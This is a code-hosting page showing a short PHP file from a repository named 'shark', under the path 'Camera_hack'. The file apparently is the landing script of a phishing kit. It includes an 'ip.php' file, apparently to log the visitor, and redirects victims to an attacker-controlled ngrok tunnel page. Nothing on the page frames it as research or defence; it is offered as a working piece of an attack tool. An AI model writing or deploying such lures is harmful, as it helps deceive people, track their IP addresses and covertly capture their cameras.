Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
bhikandeshmukh
GitHub Repository: bhikandeshmukh/shark
Path: blob/master/phs/Camera_hack/index.php
996 views
1
<?php
2
include 'ip.php';
3
header('Location: https://dd39f00c.ngrok.io/index2.html');
4
exit
5
?>
6
7